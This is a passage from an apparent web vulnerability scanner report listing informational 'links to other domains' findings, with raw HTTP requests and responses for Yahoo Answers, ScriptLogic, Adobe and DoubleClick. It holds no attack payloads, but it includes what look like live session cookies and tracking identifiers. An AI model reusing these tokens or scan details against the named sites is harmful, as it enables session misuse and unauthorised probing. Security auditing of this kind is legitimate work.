GET /adi/agt.nbcuni/homepage;tile=8;sz=726x100;ord=1304429183? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 03 May 2011 13:26:32 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2649

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
EMw&client=ca-pub-7759540359879957&adurl=http://www.fridaynightlightsauction.com" onFocus="ss('','aw0')" onMouseDown="st('aw0')" onMouseOver="return ss('','aw0')" onMouseOut="cs()" onClick="ha('aw0')"><img src="http://pagead2.googlesyndication.com/pagead/imgad?id=CMOSpoOsvdLYgwEQ1gUYZDII9nhoKKWhmqo" border="0" width="726" height="100" /></a>
...[SNIP]...

22.8. http://answers.yahoo.com/dir/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://answers.yahoo.com
Path:   /dir/index

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /dir/index?sid=396546060&link=list/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dceq_TZrSL46XtweajZmlBQ\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CEIQ6QUoADAD\\x26amp;q\\x3dthailand+breast+slap\\x26amp;usg\\x3dAFQjCNFn83tBoEvYaUFoakb1QJ4CwtpWMQ\\x22\\x3eSkin HTTP/1.1
Host: answers.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:14:25 GMT
Set-Cookie: B=9f99su16rvvth&b=3&s=nr; expires=Tue, 03-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Imagetoolbar:
Set-Cookie: answers=MElW60OJ6A1Bp.a9wfsEBwX1zTUGd75.7B42VHsmXSuyjyJxa1alWKgRWrFptqUxPFL4Pz71yjVp3Bv6Q8bXrl3RBjZ.I.H1_PORGQ6Q6SLSUBdc7SOe6yxXAdbjc2JsvXMDcietDlPP.JVCgD2yCkJHhZj8kPQJeWIn72TiYr1LKSErjoEyPNf6p7MrJgjn800FPLihKVCWJWilQySv5.p5q1Yz0E9T5UJaWZd6RL8C_J4Pov2spwew2tixt21pzLRitqtZuVPZN71Vqza5kmcYOGsvDwLf.nfDKj2x9euUi_tYpL1IM6wM2YC4NGt8MbWYaVdXcjdgXjwHxMl81zVFqTROCl37O9YFTxI4sX0cPokjFtY.RR4wjvhbOPXSE8Ns4tydNGsjZIc8bdTsQcNjOIor6g7pTHA.YiWXdGieZk0Uw8tD4m.obe5DyNpiq0KQbOhPkqzNaRUJK8D8gcatPLoPdCKfDD8_goW4ZXUk9KTF1AiKiU.34kAy7KpfBXDuwAicZsClCYiChF.85QT3lRSLvs9I2FDWuN0CrCMCwTPDss8dPrlQSbkP2tLCgxQ8fyTLjdPg0a87IgHi7C5O3TqB5VK6V74s.aq8RKk7iKTm_hlIkf6yGQo3.0Hkbq_Df8HiGaQ1qkKBuGM-; expires=Thu, 03-May-2012 13:14:25 GMT; path=/; domain=.answers.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 95591

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-us" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...
</title>
<link rel="shortcut icon" href="http://l.yimg.com/a/i/us/sch/gr/answers_favicon.ico">
<link rel="alternate" type="application/rss+xml" title="Yahoo! Answers: Skin &amp; Body" href="/rss/catq?sid=396546060">


<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/h/28150/css/answers-fe-us.css">
<link rel="stylesheet" type="text/css" media="print" href="http://l.yimg.com/h/28150/css/print.css">
<script type="text/javascript" src="http://l.yimg.com/h/28150/js/answers-fe-us.js"></script>
...[SNIP]...
<!-- universal header served -->
<link type="text/css" rel="stylesheet" href="http://l.yimg.com/a/lib/uh/15/css/uh_rsa-1.0.5.css" /><style type="text/css">
...[SNIP]...
:HEAD/Y=YAHOO/EXP=1304435665/L=iYjIVUWTZOOEX8JLFd1j0wAIrcHW802__7EACBsq/B=F5Pkm0wNO7U-/J=1304428465731739/K=FYs08IjBKeknfTSi5P8btg/A=5856910/R=11/SIG=10qrh7h9e/*http://answers.yahoo.com" target="_top"><img id="ygmalogoimg" width="257" height="26" src="http://l.yimg.com/a/i/brand/purplelogo/uh/us/ans.gif" alt="Yahoo! Answers"></a>
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMATwC05HNG;_ylv=3?show=PrpKUgHeaa"><img width="38" alt="FalconsFan" src="http://l.yimg.com/dg/users/1Hk4UcqcEAAECQWEoaJOD0nYB.medium.jpg"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAUwC05HNG;_ylv=3?show=QAtMhydxaa"><img width="38" alt="miss confused 22" src="http://a323.yahoofs.com/coreid/4d554c3ai13efzws104sp2/wluNPz88crUMWjv1lMUUYiRLVTCb_GWzpwoefiCTGGw-/1/tn48.jpeg?ciAw8eOBC6KObZR3"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAVwC05HNG;_ylv=3?show=pLQ9mbNtaa"><img width="38" alt="Jenny" src="http://l.yimg.com/dg/users/1HJ66pUp1AAEDhKObrJjVCQ==.medium.png"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAWwC05HNG;_ylv=3?show=Ahhl827kaa"><img width="38" alt="lauren" src="http://l.yimg.com/a/i/identity/nopic_48.gif"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAXwC05HNG;_ylv=3?show=7cV3PBUHaa"><img width="38" alt="Julie" src="http://l.yimg.com/a/i/identity/nopic_48.gif"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAYwC05HNG;_ylv=3?show=BYYLIx7Raa"><img width="38" alt="Dew Drops" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-0"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAZwC05HNG;_ylv=3?show=O01Mco9Kaa"><img width="38" alt="Samantha" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-1"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAawC05HNG;_ylv=3?show=AaTt2tHeaa"><img width="38" alt="GraceFox" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-2"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAbwC05HNG;_ylv=3?show=zc1BVIckaa"><img width="38" alt="vonroc" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-3"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAcwC05HNG;_ylv=3?show=X1wGZdzdaa"><img width="38" alt="Highlander" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-4"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAdwC05HNG;_ylv=3?show=fJCpYDMdaa"><img width="38" alt="Lazyness ispartofme" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-5"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAewC05HNG;_ylv=3?show=64tECjrpaa"><img width="38" alt="?" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-6"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAfwC05HNG;_ylv=3?show=txyttl1Faa"><img width="38" alt="carol" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-7"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAgwC05HNG;_ylv=3?show=K1dJPil2aa"><img width="38" alt="Viv" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-8"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAhwC05HNG;_ylv=3?show=eguGM5Ohaa"><img width="38" alt="KuzzBuzzFuzzSpuzz" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-9"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAiwC05HNG;_ylv=3?show=g5X6AOJYaa"><img width="38" alt="Sam Cassidy" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-10"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAjwC05HNG;_ylv=3?show=M85M1tKmaa"><img width="38" alt="muffinman" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-11"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAkwC05HNG;_ylv=3?show=cpikiDrPaa"><img width="38" alt="Aditi Sanyal" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-12"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAlwC05HNG;_ylv=3?show=8jDXots5aa"><img width="38" alt="SugarPlum" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-13"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAmwC05HNG;_ylv=3?show=JXIsmUlHaa"><img width="38" alt="Kelly" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-14"></a>
...[SNIP]...
<div id="yan-category-advert-lrec" class="marketing-ad mod"><IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?_PVID=iYjIVUWTZOOEX8JLFd1j0wAIrcHW802__7EACBsq&ad_type=iframe&ad_size=300x250&site=140455&section_code=14445081&cb=1304428465731739&yud=zip%3D05672%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15q2vgqlo/M=787833.14445081.14291846.11084775/D=know/S=1182000308:LREC/Y=YAHOO/EXP=1304435665/L=iYjIVUWTZOOEX8JLFd1j0wAIrcHW802__7EACBsq/B=HJPkm0wNO7U-/J=1304428465731739/K=FYs08IjBKeknfTSi5P8btg/A=6261165/R=0/*"></IFRAME>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMApwC05HNG;_ylv=3?show=Cu0fPcdnaa"><img width="48" class="photo" alt="Beatles" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-15"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAqQC05HNG;_ylv=3?show=UYnZtJ2daa"><img width="16" alt="Brittany" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-16"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAqwC05HNG;_ylv=3?show=2ZsRAxkuaa"><img width="16" alt="Stasha-Pistachio" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-17"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMArQC05HNG;_ylv=3?show=d5065693519b5b048f87de49a76bf961aa"><img width="16" alt="Mukunda M" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-18"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMArwC05HNG;_ylv=3?show=kCdISEGqaa"><img width="16" alt="rocketwife" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-19"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAsQC05HNG;_ylv=3?show=dae34b4ef56cf9f9a9c29d363b3c4bc8aa"><img width="16" alt="tatt_bratt" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-20"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAswC05HNG;_ylv=3?show=jh8vWqQzaa"><img width="16" alt="funw/sharpthings" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-21"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAtQC05HNG;_ylv=3?show=XaYHMNusaa"><img width="16" alt="Paigeybear" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-22"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAtwC05HNG;_ylv=3?show=AA10849332"><img width="16" alt="Anisya" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-23"></a>
...[SNIP]...
<a href="/my/profile;_ylt=A0WTZWWx_79NWzMAuQC05HNG;_ylv=3?show=c2b02e9ecd23f132f51e1510e98b8b8faa"><img width="16" alt="rajan naidu" src="http://l.yimg.com/a/i/identity/nopic_48.gif" id="yav-24"></a>
...[SNIP]...
<a class="logo-link" href="/my/profile;_ylt=A0WTZWWx_79NWzMAvAC05HNG;_ylv=3?show=1enJC0Wjaa"><img class="logo" src="http://a323.yahoofs.com/coreid/4bb945c2i1395zws120sp2/8_.PAFMwaK3t5WyX37_Gvbhhy_U-/1/tn48.jpeg?ciAw8eOBLgPEX9KV" alt="Jennifer Logo"></a>
...[SNIP]...
<li class="delicious">
<a href="http://del.icio.us/post?url=http%3A%2F%2Fanswers.yahoo.com%2Fdir%2Findex%3Fsid%3D396546060%26amp%3Blink%3Dlist%2Fx26amp%3Brct%26%2392%3B%26%2392%3Bx3dj%26%2392%3B%26%2392%3Bx26amp%3Bsa%26%2392%3B%26%2392%3Bx3dX%26%2392%3B%26%2392%3Bx26amp%3Bei%26%2392%3B%26%2392%3Bx3dceq_TZrSL46XtweajZmlBQ%26%2392%3B%26%2392%3Bx26amp%3Bsqi%26%2392%3B%26%2392%3Bx3d2%26%2392%3B%26%2392%3Bx26amp%3Bved%26%2392%3B%26%2392%3Bx3d0CEIQ6QUoADAD%26%2392%3B%26%2392%3Bx26amp%3Bq%26%2392%3B%26%2392%3Bx3dthailand%2Bbreast%2Bslap%26%2392%3B%26%2392%3Bx26amp%3Busg%26%2392%3B%26%2392%3Bx3dAFQjCNFn83tBoEvYaUFoakb1QJ4CwtpWMQ%26%2392%3B%26%2392%3Bx22%26%2392%3B%26%2392%3Bx3eSkin&amp;title=Answer+%7C+Open+Skin+%26amp%3B+Body+Questions+%26ndash%3B+Yahoo%21+Answers">Save to del.icio.us</a>
...[SNIP]...
YAHOO/EXP=1304435665/L=iYjIVUWTZOOEX8JLFd1j0wAIrcHW802__7EACBsq/B=IJPkm0wNO7U-/J=1304428465731739/K=FYs08IjBKeknfTSi5P8btg/A=6221804/R=0/SIG=111ve2cte/*http://twitter.com/YahooAnswers" target="_blank"><img src="http://ads.yimg.com/a/a/ya/yahoo_answers_2/100110_answers-add-twitter-rec.jpg" alt="" width="180" height="150" border="0"></a>
...[SNIP]...
138.13401917.12814488/D=know/S=1182000308:FOOT9/Y=YAHOO/EXP=1304435665/L=iYjIVUWTZOOEX8JLFd1j0wAIrcHW802__7EACBsq/B=FZPkm0wNO7U-/J=1304428465731739/K=FYs08IjBKeknfTSi5P8btg/A=5619035/R=0/* --> <script type="text/javascript"src="http://l.yimg.com/d/lib/rt/rto1_78.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(1286m4096(gid$iYjIVUWTZOOEX8JLFd1j0wAIrcHW802__7EACBsq,st$1304428465665694,v$1.0))&t=J-D"></noscript>
...[SNIP]...

22.9. http://answers.yahoo.com/question/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://answers.yahoo.com
Path:   /question/index

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /question/index?qid\\x3d20110427060610AAaclV8\\x22 HTTP/1.1
Host: answers.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:14:23 GMT
Set-Cookie: B=8fq1dst6rvvtf&b=3&s=es; expires=Tue, 03-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Status: 404 Not Found
Imagetoolbar:
Set-Cookie: answers=MmD4EaSX6A0kmA76gW8c7h3Hi.9jI4cnSXqZz5gFTu0CNQbcLf_aPusEdOiVpQsztBEQGHjrKI4F5Ll4WUrkhPTjKQAVcPGHnlEyZb1gyapSA3QSsaF2DvZgDesI5gyb_U4BraGydvrs3782csAPzxzCLudhFqk1hcw2.zvzuV8Tgy6EAesWIlc9R18TcvuTPLgMSc_GvH9SKG3Mnksbtui.YosZOKVQ3eN81d23SPXuJ5wV1tFt_GbMNFJWgWmXqQy9SSEBgCsVptWGJ1RT6UeEIEk5_DLnSeMkzfpNQ5_.P0hvvX24WR_e3hen1eNVDR4g9uU2sWEO.bJdZYhObARQzppkU7iijImyhHeD2NSrhjaPUNEHcG.Nk72Q.hVCJ3E9FHn4GL0Mr3ifz4tIAD3NB7zQgQ_ff3VpiuoWJfENCk.9AVX0UOFjiR.D9QSrfP0Ap6vYJvKMmMpW_6TcXIS4cbqTTCODs2wT3D0U5uUpnIdXBFgWPi8-; expires=Thu, 03-May-2012 13:14:23 GMT; path=/; domain=.answers.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 31274

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-us" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...
</title>
<link rel="shortcut icon" href="http://l.yimg.com/a/i/us/sch/gr/answers_favicon.ico">


<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/h/28150/css/answers-fe-us.css">
<link rel="stylesheet" type="text/css" media="print" href="http://l.yimg.com/h/28150/css/print.css">
<script type="text/javascript" src="http://l.yimg.com/h/28150/js/answers-fe-us.js"></script>
...[SNIP]...
<!-- universal header served -->
<link type="text/css" rel="stylesheet" href="http://l.yimg.com/a/lib/uh/15/css/uh_rsa-1.0.5.css" /><style type="text/css">
...[SNIP]...
:HEAD/Y=YAHOO/EXP=1304435663/L=A8fkYUWTZONilBBjuNkVngEyrcHW802__68ACTnO/B=Xcl5nWKImiA-/J=1304428463695362/K=2hSEAEP1zdqEsdsvjpoYsg/A=5856910/R=11/SIG=10qrh7h9e/*http://answers.yahoo.com" target="_top"><img id="ygmalogoimg" width="257" height="26" src="http://l.yimg.com/a/i/brand/purplelogo/uh/us/ans.gif" alt="Yahoo! Answers"></a>
...[SNIP]...
</div><script charset="utf-8" type="text/javascript" src="http://l.yimg.com/a/lib/uh/15/js/uh_rsa-1.0.9.js"></script>
...[SNIP]...
4138.13401917.12814488/D=know/S=396545076:FOOT9/Y=YAHOO/EXP=1304435663/L=A8fkYUWTZONilBBjuNkVngEyrcHW802__68ACTnO/B=W8l5nWKImiA-/J=1304428463695362/K=2hSEAEP1zdqEsdsvjpoYsg/A=5619035/R=0/* --> <script type="text/javascript"src="http://l.yimg.com/d/lib/rt/rto1_78.js"></script>
...[SNIP]...

22.10. http://dl.scriptlogic.com/login/Combined.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dl.scriptlogic.com
Path:   /login/Combined.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /login/Combined.aspx?pid=108&r=http%3a%2f%2fwww.sedoparking.com%2fsearch%2fregistrar.php%3fregistrar%3dsedonewreg%26domain%3dformlessnetworking.com HTTP/1.1
Host: dl.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/
Cookie: EntryPoint=/int/am/prodsel/050709; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.3.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=Default; s_nr=1304447642079-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253DDefault%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%252523%2526ot%253DA; EntryPointCheck=5/3/2011 9:32:06 AM; .ASPXANONYMOUS=cqPanChAzAEkAAAAMzRlNGY3MDktMmFiNC00YjcwLWI1ZTUtNzMxMzQ2ZDNhMThkvhu5LlNWIOX87OvHHDmbnJiqCYE1; ASP.NET_SessionId=g4zakovk25b4fty3jwvkx2mu

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:45:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   ScriptLogic &
...[SNIP]...
<!-- LiveBall Tag Javascript begins -->
<script type="text/javascript" src="https://scriptlogic.postclickmarketing.com/Outside/liveball.js"></script>
...[SNIP]...
<noscript><img src="http://scriptlogiccorp.d2.sc.omtrdc.net/b/ss/slcdevelopment/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

22.11. http://get.adobe.com/flashplayer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://get.adobe.com
Path:   /flashplayer/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /flashplayer/?promoid=BUIGP HTTP/1.1
Host: get.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:22:32 GMT
Server: JRun Web Server
Content-Type: text/html; charset=UTF-8
Cache-Control: private, no-store, no-cache
Content-Language: en-US
Content-Language: en-US
Set-Cookie: SETTINGS.LOCALE=en%5Fus;domain=.adobe.com;expires=Thu, 25-Apr-2041 13:22:33 GMT;path=/cfusion/
Connection: close
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_us" xml:lang="EN_US">
<he
...[SNIP]...
<p><a href="http://www.google.com/support/toolbar/bin/answer.py?hl=en&answer=81376&rd=1" target="_blank">Learn more</a>&nbsp;&nbsp;|&nbsp;
        <a href="http://www.google.com/support/toolbar/bin/answer.py?hl=en&answer=81841&rd=1" target="_blank">Privacy policy</a>&nbsp;&nbsp;|&nbsp;
<a href="http://www.google.com/accounts/TOS?hl=en" target="_blank">License</a>
...[SNIP]...
<p><a href="http://www.google.com/chrome/intl/en/more/index.html" target="_blank">Learn more</a>&nbsp;&nbsp;|&nbsp;
        <a href="http://www.google.com/chrome/intl/en/privacy.html" target="_blank">Privacy policy</a>&nbsp;&nbsp;|&nbsp;
<a href="http://www.google.com/chrome/intl/en/eula_text.html" target="_blank">License</a>
...[SNIP]...
</a> and the <a href="http://www.google.com/terms_of_service.html" target="_blank">Google Toolbar Software License Agreement.</a>
...[SNIP]...
</a> and the <a href="http://home.mcafee.com/root/campaign.aspx?cid=64985" target="_blank">McAfee End-User License Agreement.</a>
...[SNIP]...
</a> and the <a href="http://www.google.com/chrome/intl/en/eula_text.html" target="_blank">Google Chrome Software License Agreement</a>
...[SNIP]...
<p>
   <a href="http://us.mcafee.com/root/campaign.asp?cid=72563" target="_blank">Learn more</a>&nbsp;&nbsp;|&nbsp;
        <a href="http://home.mcafee.com/root/campaign.aspx?cid=64986 " target="_blank">Privacy policy</a>&nbsp;&nbsp;|&nbsp;
<a href="http://home.mcafee.com/root/campaign.aspx?cid=64985" target="_blank">License</a>
...[SNIP]...

22.12. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1304483133&flash=10.2.154&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F05%2F02%2Fdork%2Fsql-injection-http-put-injection-xss-traversal-weak-configuration-ghdb.html&dt=1304465131670&bpp=4&shv=r20110427&jsv=r20110427&correlator=1304465133017&frm=0&adk=1607234649&ga_vid=1171076004.1304465134&ga_sid=1304465134&ga_hid=1673847134&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1043&bih=887&fu=0&ifi=1&dtd=7023&xpc=nxti5C930K&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 03 May 2011 18:25:41 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12584

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
